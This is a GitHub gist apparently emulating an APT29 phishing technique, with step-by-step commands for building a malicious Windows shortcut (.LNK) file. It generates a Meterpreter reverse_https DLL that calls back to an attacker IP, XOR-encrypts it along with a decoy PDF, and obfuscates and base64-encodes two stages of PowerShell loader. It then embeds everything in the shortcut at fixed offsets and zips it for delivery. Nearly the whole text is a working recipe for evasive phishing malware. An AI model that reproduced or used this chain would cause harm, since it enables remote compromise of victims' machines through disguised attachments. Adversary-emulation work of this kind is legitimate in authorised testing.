Skip to content

Instantly share code, notes, and snippets.

@refabr1k

refabr1k/lnk payload (APT29 phishing) ds7002.md

Created October 5, 2024 04:35
Show Gist options
  • Save refabr1k/1e70f2fd99cc7931f6bcab6e6950e073 to your computer and use it in GitHub Desktop.
Save refabr1k/1e70f2fd99cc7931f6bcab6e6950e073 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
lnk payload (APT29 phishing) ds7002.md

lnk payload (APT29 phishing) ds7002.lnk

image

Step 2: Generate and Obfuscate a Meterpreter DLL

# Generate a new Meterpreter DLL payload
msfvenom -p windows/x64/meterpreter/reverse_https -f dll LHOST=<YOUR ATTACKER IP ADDRESS> LPORT=443 -o meterpreter.dll

# XOR encrypt the Meterpreter DLL using the provided xor_encrypt.py script, with the letter ‘a’ as the encryption key:
python3 xor_encrypt.py -i meterpreter.dll -o meterpreter.dll_enc -k a

Step 3: Obfuscate the Decoy PDF
python3 xor_encrypt.py -i ds7002.pdf -o ds7002.pdf_enc -k a

# Step 4: Prepare the Stage 2 PowerShell Loader
# loader.ps1 that reads the specific dll and decoy pdf file length

# Step 5: Obfuscate and Base64 Encode the PowerShell Stage 2 Loader
python3 PyFuscation.py -fvp --ps loader.ps1
# copy output to loader_obf.ps1_enc

# Base64 encode the newly obfuscated PowerShell loader script, using UTF-8 encoding.
cat loader_obf.ps1 | iconv --to-code UTF-8 | base64 -w 0 > loader_obf.ps1_enc

# Step 6: Prepare the PowerShell Stage 1 Loader
# Replace the 0s in $script_length with the length of loader_obf.ps1_enc, save stage1_command.ps1 (File > Save), and close mousepad to return to the terminal.

# Step 7: Obfuscate the PowerShell Stage 1 Loader
python3 PyFuscation.py -fvp --ps stage1_command.ps1
# copy output to stage1_command_obf.ps1

# Base64 encode the obfuscated script with UTF-16LE encoding. This is the format PowerShell expects when natively evaluating encoded commands.
cat stage1_command_obf.ps1 | iconv --to-code UTF-16LE | base64 -w 0

#create envvariable and paste encoded powershell blob as variable value
ENCODED_COMMAND="paste your base64 blob here"

# Step 8: Bundle Payload Components into a Shortcut File (.LNK)
python3 evillnk.py -n ds7002.lnk -c $ENCODED_COMMAND --icon C:\Windows\System32\SHELL32.dll --index 1

# append the XOR encrypted PDF file to the .LNK file, starting from position 0x3000, using append_file.py.
python3 append_file.py -s ds7002.pdf_enc -d ds7002.lnk --seek 0x3000

# append the XOR encrypted Meterpreter DLL to the .LNK file, starting from position 0x30000.
python3 append_file.py -s meterpreter.dll_enc -d ds7002.lnk --seek 0x30000

# append the Base64 encoded PowerShell loader script to the .LNK file at position 0x5e2be.
python3 append_file.py -s loader_obf.ps1_enc -d ds7002.lnk --seek 0x5e2be

# Step 9: Place Shortcut File (.LNK) into a Zip Archive
zip ds7002.zip ds7002.lnk
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment